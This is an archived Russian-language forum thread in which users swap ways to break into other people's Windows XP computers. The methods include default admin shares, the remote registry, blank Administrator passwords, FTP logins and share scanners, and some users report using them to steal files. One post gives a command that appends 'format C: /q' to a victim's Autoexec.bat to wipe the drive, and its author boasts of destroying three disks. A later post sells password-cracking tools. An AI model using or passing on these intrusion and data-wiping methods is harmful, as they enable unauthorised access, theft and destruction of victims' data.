Просмотр полной версии : Взлом ХР
Помогите у меня такая хрень,знаю имя пользователя(Administrator) и пароль(Пароля нету).
Операционная система Xp Proffesional.
Чо я могу зделать? И если да то чо?
И какой прогой пользоватся?
Black_Death
11.12.2004, 21:45
Ну....подключись к удалённому рабочему столу...
Я пытался не получается =(
Можешь посмотреть, если по умолчанию стоят настройки в Xp, то там открыты Admin$,c$ и другие диски - можешь зайти на них или еще к примеру использовать службу удаленного реестра :)
fucker"ok
21.12.2004, 09:03
гг Rpc и ламай себе на здоровье
Зачем ломать если есть пароли?
а если нет паролей,но надо сломать dialup?
просто диалап сканер не берет(если так можно сказать)
например програ Shared Resource Scanner 6.4 free не сканит диалапы=>из этого следует что на комп к диалапщику ваще нельзя залезть?
ладно.
1)я залез на комп к чуваку(прям щас и сижу)
2)получил командную строку(его)
3)ЧТО ДЕЛАТЬ ДАЛЬШЕ?
я знаю,что-у него XP,потом-когда в адресе набираю xxx.xxx.xxx.xxx\C$ то мне предлагается ввести пасс Гостя
PEPSICOLA
22.12.2004, 23:01
Балин, а я думаю что за гости тут ко мне ломятся :d
ладно.
1)я залез на комп к чуваку(прям щас и сижу)
2)получил командную строку(его)
3)ЧТО ДЕЛАТЬ ДАЛЬШЕ?
я знаю,что-у него XP,потом-когда в адресе набираю xxx.xxx.xxx.xxx\C$ то мне предлагается ввести пасс Гостя
Зачем набираешь xxx.xxx.xxx.xxx\C$, если у тебя уже командная строка ????????
fucker"ok
25.12.2004, 08:11
Она не совсем полноценная win32 не запустить (по крайне мере у меня не получалось)
Ребут делать не зя.
Хоть регать можно, на этом можно сыграть, но у меня геморой с этим был.....
Хех так и ничего не сказали путного
короче единственное полезное,че с удаленной ком. строкой сделать-прописать форматирование диска))))
я так одному чуваку винт форматнул)))
просто когда получаешь строку в ней пишешь
echo format C: /q >> c:\Autoexec.bat
и после рестарта у жертвы винт форматнется)))
А насчет харды класная вешь!!!
насчет формат-я?
да,это конечно классно,когда ты форматируешь людям по нету винты)))
но пользы тебе,кромк моральной-никакой.
на моей совести 3 винта.))
эээ,вопрос не по теме,а тему создавать неохота-че за знак "+" у ников Algol,Егорыч,Че Гевара понятно,но вот у Puff'a тож появился,was ist das?
Кстати насчет харды форматирование вылезает только в Win98 так что на Хр и других не попрет!Использует Autoexe.bat только 98 и все а так на Хр пользы от этого нету!!!
И еще спасибо кто мозги еб*л,но до меня дошло через может попробовать залезть через Фтп то есть CuteFtp подумал и впил Логин Юзверя и зашел без всяких проблем!!Так что у кого в сетке есть компы наверняка у многих такая же история как у меня.Так что ломитесь нисмотря ни на что!!!=)
)))
я по локалке у друга и через Xsharez и через Shared Resource Scanner залезал на компы юзверей-новые фильмы и геймы тырил,так что и без фтп можна)))
а еще попробуй вместо логина ввести Администратор(без пасса) или Administrator(тож без него)-иногда пролкатывает.
вопрос-как подбирать удаленный пасс на винду?
научу взлома винди (узнавать\удалять пароли администратора) за 5 минут
я показую вам видео как я ламаю пароль потом если вам нравитса етот метод взлома а он действителен на 100%
я вам отсилаю програми которими ви можете взломать винду как я на видеоуроке ламал
Услуга по предоставлению видеоурока БЕСПЛАТА
А ПРОГРАМИ ДЛЯ ВЗЛОМА ВИНДИ ПЛАТНИ (ПО ВЕБ МАНИ ИЛИ КУПЛЯЕТЕ МНЕ КАРТОЧКУ ПОПОЛНЕНИЯ СЧЕТА на мобилу)
вот пример взлома на видеоуроке http://rapidshare.com/files/246253849/MVI_3983.mp4.html качайте смотрите
а за програмой для етово взлома
СТУЧИТЕ В АСЮ 418296231
ИЛИ ПИШИТЕ НА МИЛО tyz0101@mail.ru
Не знаешь - плати тем, кто знает. Не хочешь платить - учись и делай сам.
Его виндю взломали и украли русский язык
http://img30.imageshack.us/img30/2238/advicedog.png
Alexsize
23.06.2009, 15:48
http://www.demotivation.ru/ehq5rv007zglpic.html
вот в тему, попросили разместить.
X-RayBlade
23.06.2009, 15:48
2 tyz0101
потерпи до 1 сентября, всего 2 месяца осталось. И запомни - археология это плохо. А свои услуги одноклассникам рекламируй. Тут люди и без тебя всё умеют.
root_sashok
23.06.2009, 15:58
научу взлома винди (узнавать\удалять пароли администратора) за 5 минут,
...насяльника!
root_sashok
23.06.2009, 15:59
А ПРОГРАМИ ДЛЯ ВЗЛОМА ВИНДИ ПЛАТНИ, а за програмой для етово взлома, ПИШИТЕ НА МИЛО, насяльника!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot